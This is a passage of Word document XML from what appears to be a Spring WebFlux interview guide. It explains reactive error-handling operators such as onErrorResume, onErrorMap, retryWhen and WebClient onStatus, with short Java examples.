    </w:p>
    <w:p w14:paraId="304598D5" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E8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onclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7904FBF1"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Non-blocking I/O enhances application performance by making it more </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>efficient, scalable</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responsive</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It minimizes thread contention and resource waste by allowing the application to handle multiple concurrent I/O operations without blocking threads. This results in </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>faster response times</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higher throughput</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better user experiences</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Non-blocking I/O is especially beneficial in high-traffic, real-time, or distributed systems where concurrency and latency are critical factors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF7CDDB"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B70E709">
          <v:rect id="_x0000_i2308" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A14106" w14:textId="38D2A6F3"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13" w:name="_Toc196307993"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does Spring WebFlux handle error handling in a reactive pipeline</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="513"/>
    </w:p>
    <w:p w14:paraId="45E6149C" w14:textId="3A1C9D4B" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E86"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 WebFlux provides a set of tools for handling errors in a reactive pipeline, ensuring that errors are dealt with in a non-blocking and asynchronous manner. The key to error handling in reactive programming is that it must be done in a way that does not block the flow of the application and works seamlessly within the reactive streams. Here’s how Spring WebFlux handles error handling in a reactive pipeline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B17A3E" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E8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 Using onErrorReturn() for Fallback Values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AB60A3"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f an error occurs in a reactive stream, you can use onErrorReturn() to return a fallback value instead of propagating the error. This is useful for providing a default value in case of errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A704F7"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p>
    <w:p w14:paraId="7076309A"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Mono&lt;String&gt; data = getDataFromService()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01336F9F"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onErrorReturn("Fallback Value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4DDAFD"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this example, if getDataFromService() encounters an error, it will return "Fallback Value" instead of propagating the error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED6E68B" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E8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2. Using onErrorResume() for Fallback Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35571E2D"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nlike onErrorReturn(), onErrorResume() allows you to handle errors by applying a fallback logic or providing another Mono or Flux. This is useful when you want to perform some recovery logic (e.g., querying a secondary data source) when an error occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2D84F7"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p>
    <w:p w14:paraId="6F52ED67"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ono&lt;String&gt; data = getDataFromService()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6A7FB4"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onErrorResume(e -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB1FCD3"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Log the error and return a different fallback Mono</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3CFBBA"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Mono.just("Alternative Fallback Value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6091D693"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55E1B498"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this case, when an error occurs in getDataFromService(), it logs the error and provides an alternative fallback value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDA1A56" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E8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3. Using doOnError() to Log Errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20313D65"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doOnError() allows you to perform side effects (such as logging) when an error occurs in a reactive stream. It’s a good practice for tracking errors for debugging and monitoring purposes without affecting the main stream of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0D119A"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p>
    <w:p w14:paraId="3C69067B"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ono&lt;String&gt; data = getDataFromService()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242A65BE"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doOnError(e -&gt; log.error("Error occurred: ", e));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098DE153"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is logs the error but does not alter the flow or output of the reactive stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2309E294" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E8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4. Using onErrorMap() to Transform Errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D460ECC"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onErrorMap() operator allows you to transform the error into another error type. This is useful when you need to map lower-level exceptions to more specific or custom exceptions that can be handled by higher layers of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B28972"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p>
    <w:p w14:paraId="434F8C04"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ono&lt;String&gt; data = getDataFromService()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBB58BB"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onErrorMap(OriginalException.class, ex -&gt; new CustomException("Transformed Error", ex));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7747F19F"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this example, if getDataFromService() throws an OriginalException, it is mapped to a CustomException to provide more meaningful error information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0D4BFD" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E8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5. Using retry() for Retries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F28D9AF"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retry() operator allows you to retry the operation a specified number of times or until a certain condition is met when an error occurs. This is useful for transient errors (e.g., network issues) where the operation might succeed if retried.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D34184A"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p>
    <w:p w14:paraId="3294C9B1"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ono&lt;String&gt; data = getDataFromService()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110A59FB"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ry(3);  // Retries up to 3 times</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552A9B05"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f getDataFromService() fails, it will retry up to 3 times before propagating the error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E89E86E" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E8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6. Using retryWhen() for Conditional Retries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA6A717"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tryWhen() allows for more complex retry logic, like retrying based on specific error conditions or introducing delays between retries. It gives you more flexibility in handling retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7365031B"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p>
    <w:p w14:paraId="0535166D"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ono&lt;String&gt; data = getDataFromService()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AA1190"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ryWhen(Retry.backoff(3, Duration.ofSeconds(1)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7770A377"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this example, the operation is retried up to 3 times, with a backoff period of 1 second between retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373C0A7C" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E8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7. Error Handling in WebFlux Controllers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156B1370"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Spring WebFlux controllers, you can use @ExceptionHandler to handle errors globally or per controller. It’s similar to Spring MVC’s exception handling mechanism, but designed for non-blocking operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D561BD"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p>
    <w:p w14:paraId="60137663"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B18EED"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MyController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C50791" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E86" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CC02DFB"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etMapping("/data")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B0A3AA"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String&gt; getData() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A839469"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 xml:space="preserve">        return someService.getData()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E17050"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onErrorMap(e -&gt; new CustomException("Error fetching data", e));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679E83AD"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472E8327" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E86" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E6A39F2"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ceptionHandler(CustomException.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3DDD65"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ResponseEntity&lt;String&gt;&gt; handleCustomException(CustomException ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C63356B"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Mono.just(ResponseEntity.status(HttpStatus.BAD_REQUEST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65053FE2"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body(ex.getMessage()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15709E2A"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1C707BAA"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2244EA66"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Here, the @ExceptionHandler method will handle CustomException and return an appropriate HTTP response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E10307" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E8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8. Using doOnTerminate() for Cleanup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3DF151"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doOnTerminate() is useful for performing cleanup or resource release tasks when the reactive stream finishes (either successfully or with an error).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125F9F19"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p>
    <w:p w14:paraId="7967407E"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ono&lt;String&gt; data = getDataFromService()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09222DBE"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doOnTerminate(() -&gt; System.out.println("Stream completed"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F41912F"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is will print a message whenever the stream terminates, regardless of whether it completed successfully or with an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116BBD00" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E8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9. Error Handling in WebClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3E6577"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hen making HTTP requests using WebClient in Spring WebFlux, you can handle errors by using .onStatus() to check for specific HTTP status codes and respond accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC7767A"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p>
    <w:p w14:paraId="3818DDB1"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ebClient.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFDB20F"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uri("/some-endpoint")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA4AC5D"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rieve()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17752722"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onStatus(HttpStatus::is4xxClientError, response -&gt; Mono.error(new ClientErrorException("Client error")))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046AF170"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onStatus(HttpStatus::is5xxServerError, response -&gt; Mono.error(new ServerErrorException("Server error")))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BCFE00"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bodyToMono(String.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E691534"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Here, specific exceptions are thrown based on the HTTP status code returned from the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705F1F24" w14:textId="77777777" w:rsidR="00EA0E86"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44B4014">
          <v:rect id="_x0000_i2309" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3A8B36" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E8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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFB5615"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 WebFlux provides several tools and operators like onErrorReturn(), onErrorResume(), onErrorMap(), doOnError(), and retry mechanisms to handle errors in a non-blocking, reactive manner. These tools ensure that errors can be handled efficiently without blocking the thread, improving both application performance and user experience. Additionally, reactive error handling supports retries, logging, transforming errors, and defining fallback logic—all crucial for building resilient and responsive applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3695BF22"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55C2455">
          <v:rect id="_x0000_i2310" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D23D11" w14:textId="41F1FE84"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14" w:name="_Toc196307994"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is onErrorResume() and how does it work</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="514"/>
    </w:p>
    <w:p w14:paraId="7D8AFB72" w14:textId="13FDEF5B" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E86"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onErrorResume() is a powerful operator in reactive programming, particularly in Spring WebFlux, that allows you to handle errors in a reactive stream by providing a fallback mechanism. It gives you the ability to recover from an error by supplying a different Mono or Flux when an error occurs. Instead of letting the error propagate further, it "resumes" the execution with a new stream that you define.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DD3F72" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E8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How onErrorResume() Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD7DC24"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hen an error occurs in a reactive pipeline, onErrorResume() allows you to react to the error and switch to another Mono or Flux (fallback logic), without terminating the stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D254837"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operator provides a fallback value or a new reactive stream to continue the flow, ensuring that the overall operation does not terminate with an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A50387A"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t can be used when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529379A2"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You want to recover from an error and continue processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAE2978"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You need to provide an alternative flow when a specific error is encountered (e.g., a network failure or an exception thrown).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A79D6D4" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E8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Syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F337522"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ono&lt;T&gt; onErrorResume(Function&lt;Throwable, ? extends Mono&lt;? extends T&gt;&gt; fallback);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64216567"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lastRenderedPageBreak/>
        <w:t>fallback</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A function that takes the exception (Throwable) and returns a new Mono (or Flux) that will be emitted when an error occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703C0844" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A160F77"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Here is an example to illustrate how onErrorResume() works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5C1E53"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Mono;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280424AE" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E86" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41FFE879"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Example {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11864BD1" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E86" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68174CF1"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static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EFA658"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Mono&lt;String&gt; data = getDataFromService()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CD7447"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onErrorResume(e -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F2C0BA"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Log the error and return a fallback value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D87FDA"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ystem.out.println("Error occurred: " + e.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ADB7B2"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Mono.just("Fallback Value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6CF7EA"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316F9417" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E86" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20910628"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data.subscribe(System.out::println);  // Output: Fallback Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A5F12A"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5721C0C8" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E86" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44EDA17B"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static Mono&lt;String&gt; getDataFromService() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B58C9F1"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Mono.error(new RuntimeException("Service error"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48480FB9"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0F8FF8B6"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2145230E"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this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745E87C1"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getDataFromService() method returns a Mono.error() that emits an error (RuntimeException).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698AF5BD"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onErrorResume() operator catches the error and returns a new Mono.just("Fallback Value") as a fallback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130252F7"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subscriber gets the fallback value ("Fallback Value") instead of the original error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B359882" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E8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Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322897B5"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rror Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: onErrorResume() is useful when you want to handle specific errors gracefully and continue the processing of the stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A50C47B"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turn a New Stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The fallback you return from onErrorResume() should be a new Mono or Flux. It doesn't just return a value—it allows you to define a new stream that will replace the failed one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678E98B2"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an Handle Specific Exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can use onErrorResume() to handle specific exceptions by checking the type of exception in the lambda function and returning different fallbacks depending on the type of error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6484C1B9" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E8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 with Conditional Fallback:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5408C6F9"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ono&lt;String&gt; data = getDataFromService()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC62674"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onErrorResume(e -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBE34D7"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f (e instanceof NetworkException) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFDE9F4"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Return a fallback Mono for network-related errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E052B47"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Mono.just("Network Fallback Value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375A2360"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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180BF8E3"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Return a different fallback for other types of exceptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E57DC3B"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Mono.just("Generic Fallback Value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA88D04"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7C369429"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54DEF48F" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E86" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="085901F9"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data.subscribe(System.out::println);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AD4FC6"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this case, if a NetworkException occurs, the fallback will be "Network Fallback Value". For other errors, it will return "Generic Fallback Value".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DA401C" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E86"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When to Use onErrorResume():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DA6291"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covery from Transient Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For example, network failures or temporary issues where retrying with an alternative value or a secondary resource is appropriate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300419D6"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rror Substitution</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you want to continue processing with some default or alternative data if the original operation fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285FF352"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Providing Fallback Logic</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In scenarios where continuing the flow with fallback data is necessary (e.g., when calling a remote service that might fail).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04065CB2" w14:textId="77777777" w:rsidR="00EA0E86"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42637BA3">
          <v:rect id="_x0000_i2311" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="031ECC38" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E86"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summary, onErrorResume() is a useful operator in reactive streams that allows you to gracefully handle errors by replacing the error-producing stream with a fallback. This prevents the entire reactive pipeline from failing and enables you to continue processing with a new stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F645174"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AEA7F1D">
          <v:rect id="_x0000_i2312" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2695BA84" w14:textId="798B170F"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15" w:name="_Toc196307995"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is onErrorReturn() in Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="515"/>
    </w:p>
